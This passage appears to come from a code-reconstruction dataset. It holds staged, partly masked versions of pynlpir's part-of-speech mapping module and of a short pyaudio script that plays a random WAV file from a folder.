pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-2": "<mask token>\n\n\ndef _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in ('parent', 'child', 'all', 'raw'):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'\"\n .format(names))\n logger.debug(\"Getting {0} POS name for '{1}' formatted as '{2}'.\".\n format('English' if english else 'Chinese', pos_code, names))\n if names == 'raw':\n return pos_code\n pos_code = pos_code.lower()\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".\n format(pos_code))\n return None\n pos = pos_entry[1 if english else 0],\n if names == 'parent':\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'\"\n .format(pos_entry[1], pos_code))\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n if names == 'all':\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = sub_pos,\n name = pos if names == 'all' else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. 
``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-3": "<mask token>\nlogger = logging.getLogger('pynlpir.pos_map')\nPOS_MAP = {'n': ('名词', 'noun', {'nr': ('人名', 'personal name', {'nr1': (\n '汉语姓氏', 'Chinese surname'), 'nr2': ('汉语名字', 'Chinese given name'),\n 'nrj': ('日语人名', 'Japanese personal name'), 'nrf': ('音译人名',\n 'transcribed personal name')}), 'ns': ('地名', 'toponym', {'nsf': ('音译地名',\n 'transcribed toponym')}), 'nt': ('机构团体名', 'organization/group name'),\n 'nz': ('其它专名', 'other proper noun'), 'nl': ('名词性惯用语', 'noun phrase'),\n 'ng': ('名词性语素', 'noun morpheme')}), 't': ('时间词', 'time word', {'tg': (\n '时间词性语素', 'time morpheme')}), 's': ('处所词', 'locative word'), 'f': (\n '方位词', 'noun of locality'), 'v': ('动词', 'verb', {'vd': ('副动词',\n 'auxiliary verb'), 'vn': ('名动词', 'noun-verb'), 'vshi': ('动词\"是\"',\n 'verb 是'), 'vyou': ('动词\"有\"', 'verb 有'), 'vf': ('趋向动词',\n 'directional verb'), 'vx': ('行事动词', 'performative verb'), 'vi': (\n '不及物动词', 'intransitive verb'), 'vl': ('动词性惯用语', 'verb phrase'), 'vg': (\n '动词性语素', 'verb morpheme')}), 'a': ('形容词', 'adjective', {'ad': ('副形词',\n 'auxiliary adjective'), 'an': ('名形词', 'noun-adjective'), 'ag': (\n '形容词性语素', 'adjective morpheme'), 'al': ('形容词性惯用语', 'adjective phrase')}\n ), 'b': ('区别词', 'distinguishing word', {'bl': ('区别词性惯用语',\n 'distinguishing phrase')}), 'z': ('状态词', 'status word'), 'r': ('代词',\n 'pronoun', {'rr': ('人称代词', 'personal pronoun'), 'rz': ('指示代词',\n 'demonstrative pronoun', {'rzt': ('时间指示代词',\n 'temporal demonstrative pronoun'), 'rzs': ('处所指示代词',\n 'locative demonstrative pronoun'), 'rzv': ('谓词性指示代词',\n 'predicate demonstrative pronoun')}), 'ry': ('疑问代词',\n 'interrogative pronoun', {'ryt': ('时间疑问代词',\n 'temporal interrogative pronoun'), 'rys': ('处所疑问代词',\n 'locative interrogative pronoun'), 'ryv': ('谓词性疑问代词',\n 'predicate interrogative pronoun')}), 'rg': ('代词性语素',\n 'pronoun morpheme')}), 'm': ('数词', 'numeral', {'mq': ('数量词',\n 'numeral-plus-classifier compound'), 'mg': ('干支', 'zodiac')}), 'q': (\n '量词', 'classifier', {'qv': ('动量词', 'verbal classifier'), 
'qt': ('时量词',\n 'temporal classifier')}), 'd': ('副词', 'adverb'), 'p': ('介词',\n 'preposition', {'pba': ('介词“把”', 'preposition 把'), 'pbei': ('介词“被”',\n 'preposition 被')}), 'c': ('连词', 'conjunction', {'cc': ('并列连词',\n 'coordinating conjunction')}), 'u': ('助词', 'particle', {'uzhe': ('着',\n 'particle 着'), 'ule': ('了/喽', 'particle 了/喽'), 'uguo': ('过',\n 'particle 过'), 'ude1': ('的/底', 'particle 的/底'), 'ude2': ('地',\n 'particle 地'), 'ude3': ('得', 'particle 得'), 'usuo': ('所', 'particle 所'),\n 'udeng': ('等/等等/云云', 'particle 等/等等/云云'), 'uyy': ('一样/一般/似的/般',\n 'particle 一样/一般/似的/般'), 'udh': ('的话', 'particle 的话'), 'uls': (\n '来讲/来说/而言/说来', 'particle 来讲/来说/而言/说来'), 'uzhi': ('之', 'particle 之'),\n 'ulian': ('连', 'particle 连')}), 'e': ('叹词', 'interjection'), 'y': (\n '语气词', 'modal particle'), 'o': ('拟声词', 'onomatopoeia'), 'h': ('前缀',\n 'prefix'), 'k': ('后缀', 'suffix'), 'x': ('字符串', 'string', {'xe': (\n 'Email字符串', 'email address'), 'xs': ('微博会话分隔符', 'hashtag'), 'xm': (\n '表情符合', 'emoticon'), 'xu': ('网址URL', 'URL'), 'xx': ('非语素字',\n 'non-morpheme character')}), 'w': ('标点符号', 'punctuation mark', {'wkz':\n ('左括号', 'left parenthesis/bracket'), 'wky': ('右括号',\n 'right parenthesis/bracket'), 'wyz': ('左引号', 'left quotation mark'),\n 'wyy': ('右引号', 'right quotation mark'), 'wj': ('句号', 'period'), 'ww': (\n '问号', 'question mark'), 'wt': ('叹号', 'exclamation mark'), 'wd': ('逗号',\n 'comma'), 'wf': ('分号', 'semicolon'), 'wn': ('顿号', 'enumeration comma'),\n 'wm': ('冒号', 'colon'), 'ws': ('省略号', 'ellipsis'), 'wp': ('破折号', 'dash'),\n 'wb': ('百分号千分号', 'percent/per mille sign'), 'wh': ('单位符号',\n 'unit of measure sign')}), 'g': ('复合语', 'multiword expression'), 'j': (\n '略语', 'abbreviation')}\n\n\ndef _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in ('parent', 'child', 'all', 'raw'):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'\"\n .format(names))\n 
logger.debug(\"Getting {0} POS name for '{1}' formatted as '{2}'.\".\n format('English' if english else 'Chinese', pos_code, names))\n if names == 'raw':\n return pos_code\n pos_code = pos_code.lower()\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".\n format(pos_code))\n return None\n pos = pos_entry[1 if english else 0],\n if names == 'parent':\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'\"\n .format(pos_entry[1], pos_code))\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n if names == 'all':\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = sub_pos,\n name = pos if names == 'all' else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. 
``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-4": "<mask token>\nimport logging\nlogger = logging.getLogger('pynlpir.pos_map')\nPOS_MAP = {'n': ('名词', 'noun', {'nr': ('人名', 'personal name', {'nr1': (\n '汉语姓氏', 'Chinese surname'), 'nr2': ('汉语名字', 'Chinese given name'),\n 'nrj': ('日语人名', 'Japanese personal name'), 'nrf': ('音译人名',\n 'transcribed personal name')}), 'ns': ('地名', 'toponym', {'nsf': ('音译地名',\n 'transcribed toponym')}), 'nt': ('机构团体名', 'organization/group name'),\n 'nz': ('其它专名', 'other proper noun'), 'nl': ('名词性惯用语', 'noun phrase'),\n 'ng': ('名词性语素', 'noun morpheme')}), 't': ('时间词', 'time word', {'tg': (\n '时间词性语素', 'time morpheme')}), 's': ('处所词', 'locative word'), 'f': (\n '方位词', 'noun of locality'), 'v': ('动词', 'verb', {'vd': ('副动词',\n 'auxiliary verb'), 'vn': ('名动词', 'noun-verb'), 'vshi': ('动词\"是\"',\n 'verb 是'), 'vyou': ('动词\"有\"', 'verb 有'), 'vf': ('趋向动词',\n 'directional verb'), 'vx': ('行事动词', 'performative verb'), 'vi': (\n '不及物动词', 'intransitive verb'), 'vl': ('动词性惯用语', 'verb phrase'), 'vg': (\n '动词性语素', 'verb morpheme')}), 'a': ('形容词', 'adjective', {'ad': ('副形词',\n 'auxiliary adjective'), 'an': ('名形词', 'noun-adjective'), 'ag': (\n '形容词性语素', 'adjective morpheme'), 'al': ('形容词性惯用语', 'adjective phrase')}\n ), 'b': ('区别词', 'distinguishing word', {'bl': ('区别词性惯用语',\n 'distinguishing phrase')}), 'z': ('状态词', 'status word'), 'r': ('代词',\n 'pronoun', {'rr': ('人称代词', 'personal pronoun'), 'rz': ('指示代词',\n 'demonstrative pronoun', {'rzt': ('时间指示代词',\n 'temporal demonstrative pronoun'), 'rzs': ('处所指示代词',\n 'locative demonstrative pronoun'), 'rzv': ('谓词性指示代词',\n 'predicate demonstrative pronoun')}), 'ry': ('疑问代词',\n 'interrogative pronoun', {'ryt': ('时间疑问代词',\n 'temporal interrogative pronoun'), 'rys': ('处所疑问代词',\n 'locative interrogative pronoun'), 'ryv': ('谓词性疑问代词',\n 'predicate interrogative pronoun')}), 'rg': ('代词性语素',\n 'pronoun morpheme')}), 'm': ('数词', 'numeral', {'mq': ('数量词',\n 'numeral-plus-classifier compound'), 'mg': ('干支', 'zodiac')}), 'q': (\n '量词', 'classifier', {'qv': ('动量词', 
'verbal classifier'), 'qt': ('时量词',\n 'temporal classifier')}), 'd': ('副词', 'adverb'), 'p': ('介词',\n 'preposition', {'pba': ('介词“把”', 'preposition 把'), 'pbei': ('介词“被”',\n 'preposition 被')}), 'c': ('连词', 'conjunction', {'cc': ('并列连词',\n 'coordinating conjunction')}), 'u': ('助词', 'particle', {'uzhe': ('着',\n 'particle 着'), 'ule': ('了/喽', 'particle 了/喽'), 'uguo': ('过',\n 'particle 过'), 'ude1': ('的/底', 'particle 的/底'), 'ude2': ('地',\n 'particle 地'), 'ude3': ('得', 'particle 得'), 'usuo': ('所', 'particle 所'),\n 'udeng': ('等/等等/云云', 'particle 等/等等/云云'), 'uyy': ('一样/一般/似的/般',\n 'particle 一样/一般/似的/般'), 'udh': ('的话', 'particle 的话'), 'uls': (\n '来讲/来说/而言/说来', 'particle 来讲/来说/而言/说来'), 'uzhi': ('之', 'particle 之'),\n 'ulian': ('连', 'particle 连')}), 'e': ('叹词', 'interjection'), 'y': (\n '语气词', 'modal particle'), 'o': ('拟声词', 'onomatopoeia'), 'h': ('前缀',\n 'prefix'), 'k': ('后缀', 'suffix'), 'x': ('字符串', 'string', {'xe': (\n 'Email字符串', 'email address'), 'xs': ('微博会话分隔符', 'hashtag'), 'xm': (\n '表情符合', 'emoticon'), 'xu': ('网址URL', 'URL'), 'xx': ('非语素字',\n 'non-morpheme character')}), 'w': ('标点符号', 'punctuation mark', {'wkz':\n ('左括号', 'left parenthesis/bracket'), 'wky': ('右括号',\n 'right parenthesis/bracket'), 'wyz': ('左引号', 'left quotation mark'),\n 'wyy': ('右引号', 'right quotation mark'), 'wj': ('句号', 'period'), 'ww': (\n '问号', 'question mark'), 'wt': ('叹号', 'exclamation mark'), 'wd': ('逗号',\n 'comma'), 'wf': ('分号', 'semicolon'), 'wn': ('顿号', 'enumeration comma'),\n 'wm': ('冒号', 'colon'), 'ws': ('省略号', 'ellipsis'), 'wp': ('破折号', 'dash'),\n 'wb': ('百分号千分号', 'percent/per mille sign'), 'wh': ('单位符号',\n 'unit of measure sign')}), 'g': ('复合语', 'multiword expression'), 'j': (\n '略语', 'abbreviation')}\n\n\ndef _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in ('parent', 'child', 'all', 'raw'):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'\"\n 
.format(names))\n logger.debug(\"Getting {0} POS name for '{1}' formatted as '{2}'.\".\n format('English' if english else 'Chinese', pos_code, names))\n if names == 'raw':\n return pos_code\n pos_code = pos_code.lower()\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".\n format(pos_code))\n return None\n pos = pos_entry[1 if english else 0],\n if names == 'parent':\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'\"\n .format(pos_entry[1], pos_code))\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n if names == 'all':\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = sub_pos,\n name = pos if names == 'all' else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. 
``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Part of speech mapping constants and functions for NLPIR/ICTCLAS.\n\nThis module is used by :mod:`pynlpir` to format segmented words for output.\n\n\"\"\"\nimport logging\n\n\nlogger = logging.getLogger(\"pynlpir.pos_map\")\n\n#: A dictionary that maps part of speech codes returned by NLPIR to\n#: human-readable names (English and Chinese).\nPOS_MAP = {\n \"n\": (\n \"名词\",\n \"noun\",\n {\n \"nr\": (\n \"人名\",\n \"personal name\",\n {\n \"nr1\": (\"汉语姓氏\", \"Chinese surname\"),\n \"nr2\": (\"汉语名字\", \"Chinese given name\"),\n \"nrj\": (\"日语人名\", \"Japanese personal name\"),\n \"nrf\": (\"音译人名\", \"transcribed personal name\"),\n },\n ),\n \"ns\": (\n \"地名\",\n \"toponym\",\n {\n \"nsf\": (\"音译地名\", \"transcribed toponym\"),\n },\n ),\n \"nt\": (\"机构团体名\", \"organization/group name\"),\n \"nz\": (\"其它专名\", \"other proper noun\"),\n \"nl\": (\"名词性惯用语\", \"noun phrase\"),\n \"ng\": (\"名词性语素\", \"noun morpheme\"),\n },\n ),\n \"t\": (\n \"时间词\",\n \"time word\",\n {\n \"tg\": (\"时间词性语素\", \"time morpheme\"),\n },\n ),\n \"s\": (\"处所词\", \"locative word\"),\n \"f\": (\"方位词\", \"noun of locality\"),\n \"v\": (\n \"动词\",\n \"verb\",\n {\n \"vd\": (\"副动词\", \"auxiliary verb\"),\n \"vn\": (\"名动词\", \"noun-verb\"),\n \"vshi\": ('动词\"是\"', \"verb 是\"),\n \"vyou\": ('动词\"有\"', \"verb 有\"),\n \"vf\": (\"趋向动词\", \"directional verb\"),\n \"vx\": (\"行事动词\", \"performative verb\"),\n \"vi\": (\"不及物动词\", \"intransitive verb\"),\n \"vl\": (\"动词性惯用语\", \"verb phrase\"),\n \"vg\": (\"动词性语素\", \"verb morpheme\"),\n },\n ),\n \"a\": (\n \"形容词\",\n \"adjective\",\n {\n \"ad\": (\"副形词\", \"auxiliary adjective\"),\n \"an\": (\"名形词\", \"noun-adjective\"),\n \"ag\": (\"形容词性语素\", \"adjective morpheme\"),\n \"al\": (\"形容词性惯用语\", \"adjective phrase\"),\n },\n ),\n \"b\": (\n \"区别词\",\n \"distinguishing word\",\n {\n \"bl\": (\"区别词性惯用语\", \"distinguishing phrase\"),\n },\n ),\n \"z\": (\"状态词\", \"status word\"),\n \"r\": (\n \"代词\",\n \"pronoun\",\n {\n 
\"rr\": (\"人称代词\", \"personal pronoun\"),\n \"rz\": (\n \"指示代词\",\n \"demonstrative pronoun\",\n {\n \"rzt\": (\"时间指示代词\", \"temporal demonstrative pronoun\"),\n \"rzs\": (\"处所指示代词\", \"locative demonstrative pronoun\"),\n \"rzv\": (\"谓词性指示代词\", \"predicate demonstrative pronoun\"),\n },\n ),\n \"ry\": (\n \"疑问代词\",\n \"interrogative pronoun\",\n {\n \"ryt\": (\"时间疑问代词\", \"temporal interrogative pronoun\"),\n \"rys\": (\"处所疑问代词\", \"locative interrogative pronoun\"),\n \"ryv\": (\"谓词性疑问代词\", \"predicate interrogative pronoun\"),\n },\n ),\n \"rg\": (\"代词性语素\", \"pronoun morpheme\"),\n },\n ),\n \"m\": (\n \"数词\",\n \"numeral\",\n {\n \"mq\": (\"数量词\", \"numeral-plus-classifier compound\"),\n \"mg\": (\"干支\", \"zodiac\"),\n },\n ),\n \"q\": (\n \"量词\",\n \"classifier\",\n {\n \"qv\": (\"动量词\", \"verbal classifier\"),\n \"qt\": (\"时量词\", \"temporal classifier\"),\n },\n ),\n \"d\": (\"副词\", \"adverb\"),\n \"p\": (\n \"介词\",\n \"preposition\",\n {\n \"pba\": (\"介词“把”\", \"preposition 把\"),\n \"pbei\": (\"介词“被”\", \"preposition 被\"),\n },\n ),\n \"c\": (\n \"连词\",\n \"conjunction\",\n {\n \"cc\": (\"并列连词\", \"coordinating conjunction\"),\n },\n ),\n \"u\": (\n \"助词\",\n \"particle\",\n {\n \"uzhe\": (\"着\", \"particle 着\"),\n \"ule\": (\"了/喽\", \"particle 了/喽\"),\n \"uguo\": (\"过\", \"particle 过\"),\n \"ude1\": (\"的/底\", \"particle 的/底\"),\n \"ude2\": (\"地\", \"particle 地\"),\n \"ude3\": (\"得\", \"particle 得\"),\n \"usuo\": (\"所\", \"particle 所\"),\n \"udeng\": (\"等/等等/云云\", \"particle 等/等等/云云\"),\n \"uyy\": (\"一样/一般/似的/般\", \"particle 一样/一般/似的/般\"),\n \"udh\": (\"的话\", \"particle 的话\"),\n \"uls\": (\"来讲/来说/而言/说来\", \"particle 来讲/来说/而言/说来\"),\n \"uzhi\": (\"之\", \"particle 之\"),\n \"ulian\": (\"连\", \"particle 连\"),\n },\n ),\n \"e\": (\"叹词\", \"interjection\"),\n \"y\": (\"语气词\", \"modal particle\"),\n \"o\": (\"拟声词\", \"onomatopoeia\"),\n \"h\": (\"前缀\", \"prefix\"),\n \"k\": (\"后缀\", \"suffix\"),\n \"x\": (\n \"字符串\",\n \"string\",\n {\n \"xe\": (\"Email字符串\", 
\"email address\"),\n \"xs\": (\"微博会话分隔符\", \"hashtag\"),\n \"xm\": (\"表情符合\", \"emoticon\"),\n \"xu\": (\"网址URL\", \"URL\"),\n \"xx\": (\"非语素字\", \"non-morpheme character\"),\n },\n ),\n \"w\": (\n \"标点符号\",\n \"punctuation mark\",\n {\n \"wkz\": (\"左括号\", \"left parenthesis/bracket\"),\n \"wky\": (\"右括号\", \"right parenthesis/bracket\"),\n \"wyz\": (\"左引号\", \"left quotation mark\"),\n \"wyy\": (\"右引号\", \"right quotation mark\"),\n \"wj\": (\"句号\", \"period\"),\n \"ww\": (\"问号\", \"question mark\"),\n \"wt\": (\"叹号\", \"exclamation mark\"),\n \"wd\": (\"逗号\", \"comma\"),\n \"wf\": (\"分号\", \"semicolon\"),\n \"wn\": (\"顿号\", \"enumeration comma\"),\n \"wm\": (\"冒号\", \"colon\"),\n \"ws\": (\"省略号\", \"ellipsis\"),\n \"wp\": (\"破折号\", \"dash\"),\n \"wb\": (\"百分号千分号\", \"percent/per mille sign\"),\n \"wh\": (\"单位符号\", \"unit of measure sign\"),\n },\n ),\n \"g\": (\"复合语\", \"multiword expression\"),\n \"j\": (\"略语\", \"abbreviation\"),\n}\n\n\ndef _get_pos_name(pos_code, names=\"parent\", english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in (\"parent\", \"child\", \"all\", \"raw\"):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or \"\n \"'raw'; not '{0}'\".format(names)\n )\n logger.debug(\n \"Getting {0} POS name for '{1}' formatted as '{2}'.\".format(\n \"English\" if english else \"Chinese\", pos_code, names\n )\n )\n if names == \"raw\":\n return pos_code\n pos_code = pos_code.lower() # Issue #10\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".format(pos_code))\n return None # Issue #20\n pos = (pos_entry[1 if english else 0],)\n if names == \"parent\":\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n 
logger.debug(\n \"Found parent part of speech name '{0}'. Descending to \"\n \"look for child name for '{1}'\".format(pos_entry[1], pos_code)\n )\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n\n if names == \"all\":\n # sub_pos can be None sometimes (e.g. for a word '甲')\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = (sub_pos,)\n\n name = pos if names == \"all\" else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name=\"parent\", english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def getNextFile(files):
return random.choice(files)
<|reserved_special_token_0|>
def getRandomFile(folder='test/'):
files = listFiles(folder)
filename = getNextFile(files)
return filename
def play(filename):
f = wave.open(filename, 'rb')
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(f.getsampwidth()),
channels=f.getnchannels(), rate=f.getframerate(), output=True)
data = f.readframes(CHUNK)
while data:
stream.write(data)
data = f.readframes(CHUNK)
stream.stop_stream()
stream.close()
p.terminate()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def listFiles(path):
return glob.glob(path + '*.wav')
<|reserved_special_token_0|>
def getNextFile(files):
return random.choice(files)
<|reserved_special_token_0|>
def getRandomFile(folder='test/'):
files = listFiles(folder)
filename = getNextFile(files)
return filename
def play(filename):
f = wave.open(filename, 'rb')
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(f.getsampwidth()),
channels=f.getnchannels(), rate=f.getframerate(), output=True)
data = f.readframes(CHUNK)
while data:
stream.write(data)
data = f.readframes(CHUNK)
stream.stop_stream()
stream.close()
p.terminate()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def listFiles(path):
return glob.glob(path + '*.wav')
<|reserved_special_token_0|>
def getNextFile(files):
return random.choice(files)
<|reserved_special_token_0|>
CHUNK = 1024
def getRandomFile(folder='test/'):
files = listFiles(folder)
filename = getNextFile(files)
return filename
def play(filename):
f = wave.open(filename, 'rb')
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(f.getsampwidth()),
channels=f.getnchannels(), rate=f.getframerate(), output=True)
data = f.readframes(CHUNK)
while data:
stream.write(data)
data = f.readframes(CHUNK)
stream.stop_stream()
stream.close()
p.terminate()
<|reserved_special_token_1|>
import glob
def listFiles(path):
return glob.glob(path + '*.wav')
import random
def getNextFile(files):
return random.choice(files)
import pyaudio
import wave
CHUNK = 1024
def getRandomFile(folder='test/'):
files = listFiles(folder)
filename = getNextFile(files)
return filename
def play(filename):
f = wave.open(filename, 'rb')
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(f.getsampwidth()),
channels=f.getnchannels(), rate=f.getframerate(), output=True)
data = f.readframes(CHUNK)
while data:
stream.write(data)
data = f.readframes(CHUNK)
stream.stop_stream()
stream.close()
p.terminate()
<|reserved_special_token_1|>
# list audio files
import glob
def listFiles(path):
return glob.glob(path + '*.wav')
import random
def getNextFile(files):
return random.choice(files)
import pyaudio
import wave
CHUNK = 1024
def getRandomFile(folder = 'test/'):
files = listFiles(folder)
filename = getNextFile(files)
return filename
def play(filename):
# opem file
f = wave.open(filename, 'rb')
p = pyaudio.PyAudio()
#open stream
stream = p.open(format = p.get_format_from_width(f.getsampwidth()),
channels = f.getnchannels(),
rate = f.getframerate(),
output = True)
# read data
data = f.readframes(CHUNK)
#play stream
while data:
stream.write(data)
data = f.readframes(CHUNK)
#stop stream
stream.stop_stream()
stream.close()
#close PyAudio
p.terminate()
|
flexible
|
{
"blob_id": "a3bcd383656284a2236e79b5d5d7acdfe433a13b",
"index": 8409,
"step-1": "<mask token>\n\n\ndef getNextFile(files):\n return random.choice(files)\n\n\n<mask token>\n\n\ndef getRandomFile(folder='test/'):\n files = listFiles(folder)\n filename = getNextFile(files)\n return filename\n\n\ndef play(filename):\n f = wave.open(filename, 'rb')\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(f.getsampwidth()),\n channels=f.getnchannels(), rate=f.getframerate(), output=True)\n data = f.readframes(CHUNK)\n while data:\n stream.write(data)\n data = f.readframes(CHUNK)\n stream.stop_stream()\n stream.close()\n p.terminate()\n",
"step-2": "<mask token>\n\n\ndef listFiles(path):\n return glob.glob(path + '*.wav')\n\n\n<mask token>\n\n\ndef getNextFile(files):\n return random.choice(files)\n\n\n<mask token>\n\n\ndef getRandomFile(folder='test/'):\n files = listFiles(folder)\n filename = getNextFile(files)\n return filename\n\n\ndef play(filename):\n f = wave.open(filename, 'rb')\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(f.getsampwidth()),\n channels=f.getnchannels(), rate=f.getframerate(), output=True)\n data = f.readframes(CHUNK)\n while data:\n stream.write(data)\n data = f.readframes(CHUNK)\n stream.stop_stream()\n stream.close()\n p.terminate()\n",
